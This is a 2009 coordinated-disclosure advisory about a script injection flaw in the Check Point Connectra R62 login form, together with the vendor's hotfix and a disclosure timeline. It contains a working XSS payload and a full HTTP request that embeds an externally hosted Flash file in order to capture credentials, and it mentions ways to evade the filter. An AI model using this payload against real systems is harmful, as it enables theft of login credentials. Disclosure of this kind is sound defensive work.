scip-cp.txt
Posted on 21 September 2009
Check Point Connectra R62 Login Script Injection Vulnerability scip AG Vulnerability ID 4020 (09/04/2009) http://www.scip.ch/?vuldb.4020 I. INTRODUCTION Check Point Connectra is a so-called SSL-VPN solution, which allows users to access a remote system using a regular web browser. More information is available on the official product web site at the following URL[1]: http://www.checkpoint.com/products/connectra/index.html II. DESCRIPTION Stefan Friedli at scip AG (Switzerland) found an input validation error within the current release, which enabled an attacker to perform various web-based attacks. The initial logon script at /Login/Login, that is being used for unauthenticated users to log in, fails to perform proper input validation on the data that is being submitted via HTTP POST. While certain fields are escaped before being sent back to users browser, the parameter "vpid_prefix" lacks any validation and is therefore vulnerable to script injection. Other parts of the application might be affected too. This vulnerability has been tested on version R62, other versions might be affected as well. III. EXPLOITATION Classic script injection techniques and unexpected input data within a browser session can be used to exploit these vulnerabilities. The target application does actually check for certain patterns and prevents an attacker from using easy exploiting strings containing substrings like "script", "javascript", "alert" or similar. However, we consider this to be an imperfect mechanism that is unable to prevent an attack using a more sophisticated payload. For a selection, you might want to check RSnakes popular XSS Cheat Sheet[2], which contains several patterns not being detected by the filter in place, allowing you execute any arbitrary, externally hosted payload. We exploited the vulnerability for a customer in order to proof the possibility to capture usernames and passwords. One of the possibilities mentioned above is, to embed a remote flash file and grant it the permission to execute script code. Vulnerable Variable Value: vpid_prefix = "><embed/src="http://www.scip.ch/p/s/w/ccs.swf" allowScriptAccess=always><a name=" --- CUT --- POST https://TARGET:443/Login/Login HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: https://TARGET/Login/Login?LangCode= Cookie: CheckCookieSupport=1; ICSCookie=***purged***; user_locale=en_US Content-Type: application/x-www-form-urlencoded Content-length: 153 loginType=Standard&userName=&vpid_prefix="><embed/src="http://www.scip.c h/p/s/w/ccs.swf" allowScriptAccess=always><a name=" &password=&HeightData=1147&Login=Sign+In --- CUT END --- Response Snippet: --- CUT --- <input type="hidden" id="vpid_prefix" name="vpid_prefix" value=""><embed/src="http://www.scip.ch/p/s/w/ccs.swf" allowScriptAccess=always><a name=""> --- CUT END --- IV. IMPACT Because non-authenticated parts of the software are affected, this vulnerability is serious for every secure environment. Non-authenticated users might be able to exploit this flaw to gain elevated privileges in the target environment (e.g. extracting sensitive cookie information or login information) or to perform any other form of web-based attacks. Due to the fact that the application will often be allowed to make use of ActiveX, it can also be used as a springboard to inject other payloads, for example MS09-037[3] or any other vulnerability disclosed lately, that might be exploited using a web browser. Because other parts of the application might be affected too - this could include some second order vulnerabilities - a severe attack scenario might be possible. V. DETECTION Detection of web based attacks requires a specialized web proxy and/or intrusion detection system. Patterns for such a detection are available and easy to implement. Usually the mathematical or logical symbols for less-than (<) and greater-than (>) are required to propose a HTML tag. In some cases single (') or double quotes (") are required to inject the code in a given HTML statement. Some implementation of security systems are looking for well-known attack tags as like <script> and attack attributes onMouseOver too. However, these are usually not capable of identifying highly optimized payload. VI. SOLUTION Check Point provides a hotfix for the vulnerability which should be installed on vulnerable systems VII. VENDOR RESPONSE Check Point acknowledged the problem and provides a hotfix for the vulnerability. Detailed information on the issue, maintained by Check Point, can be found at: https://supportcenter.checkpoint.com/supportcenter/portal?solutionid=sk4 2793 VIII. SOURCES scip AG - Security Consulting Information Process (german) http://www.scip.ch/ scip AG Vulnerability Database (german) http://www.scip.ch/?vuldb.4020 IX. DISCLOSURE TIMELINE 2009/09/04 Identification of the vulnerability, Vendor is being notified. 2009/09/04 Check Point confirms the receipt of the notification 2009/09/04 scip AG confirms status and procedure 2009/09/06 Check Point confirms the existence of the flaw, agrees on the proposed timeline for coordinated release and announces a hotfix 2009/09/06 scip AG confirms status and procedure 2009/09/16 Check Point states that the hotfix is currently in QA and will be ready for coordinated release within the next week 2009/09/21 Check Point is ready to release the hotfix and a public vendor response 2009/09/21 scip AG confirms and coordinates public release of advisory/vendor response/hotfix X. CREDITS The vulnerabilities were discovered by Stefan Friedli. Stefan Friedli, scip AG, Zuerich, Switzerland stfr-at-scip.ch http://www.scip.ch/ A1. BIBLIOGRAPHY [1] Connectra Official Vendor Information, Check Point http://www.checkpoint.com/products/connectra/index.html [2] XSS Cheat Sheet, RSnake http://ha.ckers.org/xss.html [3] Microsoft Security Bulletin MS09-037 - Critical, Microsoft http://www.microsoft.com/technet/security/bulletin/MS09-037.mspx [4] Check Point Vendor-Response on this issue https://supportcenter.checkpoint.com/supportcenter/LoginRedirect.jsp?toU RL=eventSubmit_doGoviewsolutiondetails=%26solutionid=sk42793 A2. LEGAL NOTICES Copyright (c) 2002-2009 scip AG, Switzerland. Permission is granted for the re-distribution of this alert. It may not be edited in any way without permission of scip AG. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect or consequential loss or damage from use of or reliance on this advisory.
